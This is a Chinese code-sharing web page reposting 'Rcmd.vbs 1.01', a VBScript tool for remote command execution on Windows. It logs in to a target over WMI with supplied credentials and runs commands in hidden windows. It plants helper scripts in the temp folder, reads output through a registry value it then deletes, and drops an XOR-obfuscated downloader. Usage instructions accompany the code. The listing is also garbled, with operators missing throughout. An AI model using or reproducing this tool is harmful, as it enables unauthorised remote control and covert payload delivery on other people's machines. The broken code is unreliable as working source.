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    企业400电话 网络优化推广 AI电话机器人 呼叫中心 网站建设 商标✡知产 微网小程序 电商运营 彩铃•短信 增值拓展业务
    Rcmd.vbs 1.01修正版 增加了下载功能

    复制代码 代码如下:

    On Error Resume Next
    Set outstreem=Wscript.stdout
    If (LCase(Right(Wscript.fullname,11))="Wscript.exe") Then
    End If

    If Wscript.arguments.Count4 Then
    Wscript.echo "Not enough Parameters."
    End If


    wsh.echo "Conneting "ip" ...."
    Set objlocator=CreateObject("wbemscripting.swbemlocator")
    Set objswbemservices=objlocator.connectserver(ip,"root/cimv2",username,password)
    Set Win_Process=objswbemservices.Get("Win32_ProcessStartup")
    Set Hide_Windows=Win_Process.SpawnInstance_
    Set Rcmd=objswbemservices.Get("Win32_Process")
    Set colFiles = objswbemservices.ExecQuery _
    ("Select * from CIM_Datafile Where Name = 'c:\\windows\\temp\\read.vbs'")
    If colFiles.Count = 0 Then
    wsh.echo "Not found read.vbs! Create Now!"

    End If

    If EchoStr = "0" Then
    msg=Rcmd.create("cmd /c "CmdStr,Null,Hide_Windows,intProcessID)
    End if
    If EchoStr = "1" Then
    msg=Rcmd.create("cmd /c cscript %windir%\temp\read.vbs """CmdStr"""",Null,Hide_Windows,intProcessID)
    End If

    If EchoStr = "3" Then
    End If

    If msg = 0 Then
    wsh.echo "Command success..."
    End If

    wsh.echo "Please Wait 3 Second ...."
    Set StdOut = Wscript.StdOut
    Set oReg=objlocator.connectserver(ip,"root/default",username,password).Get("stdregprov")
    oReg.GetMultiStringValue H80000002,"SOFTWARE\Clients","cmd" ,arrValues
    wsh.echo String(79,"*")
    wsh.echo cmdstrChr(13)Chr(10)

    For Each strValue In arrValues
    StdOut.WriteLine strValue
    oReg.DeleteValue H80000002,"SOFTWARE\Clients","cmd"

    Sub Create_read()
    RunYN =Rcmd.create("cmd /c echo set ws=WScript.CreateObject(^""WScript.Shell^"")> %windir%\temp\read.vbs"_
    "echo str=ws.Exec(^""cmd /c ^""^wscript.arguments(0)).StdOut.ReadAll:set ws=nothing>> %windir%\temp\read.vbs"_
    "echo Set oReg=GetObject(^""winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv^"")>> %windir%\temp\read.vbs"_
    "echo oReg.SetMultiStringValue ^H80000002,^""SOFTWARE\Clients^"",^""cmd^"",Array(str) >> %windir%\temp\read.vbs",Null,Hide_Windows,intProcessID)
    If RunYN = 0 Then
    wsh.echo "read.vbs Created!!!"
    End If

    End Sub

    sub Create_down()
    Rundw=Rcmd.create("cmd /c echo Function Decode(s,n):ns=Split(Mid(s,2,Len(s)-1)):For i=0 To UBound(ns):on error resume next:Decode=Decode^Chr(CInt(ns(i)) Xor n):Next:End Function>%windir%\temp\down.vbs"_
    "echo Execute(Decode(^"" 26 9 18 31 8 21 19 18 92 15 29 10 25 58 21 16 25 84 26 21 16 25 18 29 17 25 80 15 8 14 85 113 118 113 118 92 92 92 92 92 15 25 8 92 29 24 19 24 30 47 8 14 25 29 17 92 65 92 63 14 25 29 8 25 51 30 22 25 31 8 84 94 61 56 51 56 62 94 92 90 92 94 82 94 92 90 92 94 47 8 14 25 29 17 94 85 113 118 113 118 92 92 92 92 92 29 24 19 24 30 47 8 14 25 29 17 82 40 5 12 25 65 92 77 113 118 92 92 92 92 92 29 24 19 24 30 47 8 14 25 29 17 82 51 12 25 18 113 118 92 92 92 92 92 29 24 19 24 30 47 8 14 25 29 17 82 11 14 21 8 25 92 15 8 14 113 118 92 92 92 92 92 29 24 19 24 30 47 8 14 25 29 17 82 47 29 10 25 40 19 58 21 16 25 92 26 21 16 25 18 29 17 25 80 78 113 118 92 92 92 92 92 29 24 19 24 30 47 8 14 25 29 17 82 63 16 19 15 25 113 118 113 118 25 18 24 92 26 9 18 31 8 21 19 18 113 118 113 118 91 83 83 42 62 -13695 -10347 -10282 -20072 -19531 -18814 -17020 -10566 -18291 -13631 113 118 58 9 18 31 8 21 19 18 92 49 9 16 8 21 62 5 8 25 40 19 62 21 18 29 14 5 84 49 9 16 8 21 62 5 8 25 85 113 118 113 118 92 92 92 92 92 56 21 17 92 46 47 80 92 48 49 9 16 8 21 62 5 8 25 80 92 62 21 18 29 14 5 113 118 92 92 92 92 92 63 19 18 15 8 92 29 24 48 19 18 27 42 29 14 62 21 18 29 14 5 92 65 92 78 76 73 113 118 92 92 92 92 92 47 25 8 92 46 47 92 65 92 63 14 25 29 8 25 51 30 22 25 31 8 84 94 61 56 51 56 62 82 46 25 31 19 14 24 15 25 8 94 85 113 118 92 92 92 92 92 48 49 9 16 8 21 62 5 8 25 92 65 92 48 25 18 62 84 49 9 16 8 21 62 5 8 25 85 113 118 92 92 92 92 92 53 26 92 48 49 9 16 8 21 62 5 8 25 66 76 92 40 20 25 18 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 46 47 82 58 21 25 16 24 15 82 61 12 12 25 18 24 92 94 17 62 21 18 29 14 5 94 80 92 29 24 48 19 18 27 42 29 14 62 21 18 29 14 5 80 92 48 49 9 16 8 21 62 5 8 25 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 46 47 82 51 12 25 18 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 46 47 82 61 24 24 50 25 11 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 46 47 84 94 17 62 21 18 29 14 5 94 85 82 61 12 12 25 18 24 63 20 9 18 23 92 49 9 16 8 21 62 5 8 25 92 90 92 63 20 14 62 84 76 85 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 46 47 82 41 12 24 29 8 25 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 62 21 18 29 14 5 92 65 92 46 47 84 94 17 62 21 18 29 14 5 94 85 82 59 25 8 63 20 9 18 23 84 48 49 9 16 8 21 62 5 8 25 85 113 118 92 92 92 92 92 57 18 24 92 53 26 113 118 92 92 92 92 92 49 9 16 8 21 62 5 8 25 40 19 62 21 18 29 14 5 92 65 92 62 21 18 29 14 5 113 118 113 118 57 18 24 92 58 9 18 31 8 21 19 18 113 118 113 118 113 118 26 9 18 31 8 21 19 18 92 25 4 25 31 84 85 113 118 92 92 92 92 92 113 118 92 92 92 92 92 91 83 83 -14659 -20046 -19311 -12657 113 118 92 92 92 92 92 19 18 92 25 14 14 19 14 92 14 25 15 9 17 25 92 50 25 4 8 113 118 92 92 92 92 92 47 25 8 92 29 14 27 15 92 65 92 43 47 31 14 21 12 8 82 61 14 27 9 17 25 18 8 15 113 118 21 26 92 29 14 27 15 82 63 19 9 18 8 92 65 92 76 92 8 20 25 18 113 118 92 92 92 92 92 43 47 31 14 21 12 8 82 57 31 20 19 92 94 41 15 29 27 25 70 92 63 47 31 14 21 12 8 92 24 19 11 18 82 10 30 15 92 9 14 16 92 31 70 32 77 82 25 4 25 94 113 118 92 92 92 92 92 43 47 31 14 21 12 8 82 45 9 21 8 92 77 113 118 92 92 92 92 92 25 18 24 92 53 26 113 118 92 92 92 92 92 92 24 21 17 92 24 29 8 29 80 8 80 23 23 80 26 21 16 25 18 29 17 25 80 15 15 113 118 92 92 92 92 92 47 25 8 92 49 29 21 16 77 92 65 92 63 14 25 29 8 25 51 30 22 25 31 8 84 94 63 56 51 82 49 25 15 15 29 27 25 94 85 113 118 92 92 92 92 92 49 29 21 16 77 82 63 14 25 29 8 25 49 52 40 49 48 62 19 24 5 92 29 14 27 15 82 53 8 25 17 84 76 85 92 80 79 77 92 113 118 91 49 29 21 16 77 82 63 14 25 29 8 25 49 52 40 49 48 62 19 24 5 92 94 31 70 32 4 4 4 32 16 31 4 82 25 4 25 81 12 26 82 20 8 17 94 80 79 77 113 118 92 92 92 92 92 15 15 65 92 49 29 21 16 77 82 52 40 49 48 62 19 24 5 113 118 92 92 92 92 92 47 25 8 92 49 29 21 16 77 65 18 19 8 20 21 18 27 92 92 113 118 113 118 92 92 92 113 118 113 118 92 92 92 92 92 91 83 83 -19009 -19007 -13695 -16735 113 118 92 92 92 92 92 24 29 8 29 92 92 92 92 92 92 92 92 92 92 92 92 92 65 92 15 15 113 118 92 92 92 92 92 91 83 83 -19009 -19007 -12616 -17278 -15481 113 118 92 92 92 92 92 26 21 16 25 18 29 17 25 92 92 92 92 92 65 92 29 14 27 15 82 53 8 25 17 84 77 85 113 118 113 118 92 92 92 92 92 91 83 83 -19009 -19007 -13695 -16735 -19496 -18764 113 118 92 92 92 92 92 92 92 92 92 9 92 65 92 16 25 18 84 24 29 8 29 85 113 118 92 92 92 92 92 113 118 92 92 92 92 92 91 83 83 -17523 -19009 -12616 -17278 -13695 -10347 113 118 92 92 92 92 92 26 19 14 92 21 65 77 92 8 19 92 9 92 15 8 25 12 92 78 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 8 92 65 92 17 21 24 84 24 29 8 29 80 21 80 78 85 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 23 23 92 65 92 23 23 92 90 92 63 20 14 62 84 31 16 18 27 84 94 90 52 94 92 90 92 8 85 85 113 118 92 92 92 92 92 18 25 4 8 113 118 113 118 92 92 92 92 92 91 83 83 -10282 -20072 -19531 -18814 -17020 -10566 -18291 -13631 113 118 92 92 92 92 92 24 29 8 29 61 14 14 5 92 65 92 49 9 16 8 21 62 5 8 25 40 19 62 21 18 29 14 5 84 23 23 85 113 118 92 92 92 92 92 113 118 92 92 92 92 92 91 83 83 -20001 -19302 -12616 -17278 92 92 92 92 92 113 118 92 92 92 92 92 15 29 10 25 58 21 16 25 92 26 21 16 25 18 29 17 25 80 24 29 8 29 61 14 14 5 113 118 113 118 92 92 92 92 113 118 92 92 92 92 25 18 24 92 26 9 18 31 8 21 19 18 113 118 113 118 25 4 25 31 84 85 113 118 92 113 118 113 118^"",124))>>%windir%\temp\down.vbs",Null,Hide_Windows,intProcessID)

    If Rundw = 0 Then
    wsh.echo "down.vbs Created!!!"
    End If

    End Sub

    Function showerror(errornumber)
    If errornumber Then
    wsh.echo "Error 0x"CStr(Hex(Err.Number))" ."
    If Err.Description > "" Then
    wsh.echo "Error Description: "Err.Description"."
    End If
    outstreem.Write "."
    End If
    End Function

    Sub usage()
    wsh.echo string(79,"*")
    wsh.echo "Rcmd v1.01 by NetPatch modiy by lcx"
    wsh.echo "Usage:"
    wsh.echo "cscript "wscript.scriptfullname" targetIP username password ""Command"" 1 //on echo"
    wsh.echo "cscript "wscript.scriptfullname" targetIP username password ""Command"" 0 //off echo create "
    wsh.echo "cscript "wscript.scriptfullname" targetIP username password """" 3 // create cdo.message.down.vbs "
    wsh.echo string(79,"*")vbcrlf
    end Sub

    上一篇:Rcmd.vbs [Remote Cmd with wmi]远程脚本
    下一篇:vbs 更改环境变量
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    《增值电信业务经营许可证》 苏ICP备15040257号-8

    Rcmd.vbs 1.01修正版 增加了下载功能 Rcmd.vbs,1.01,修,正版,增,加了,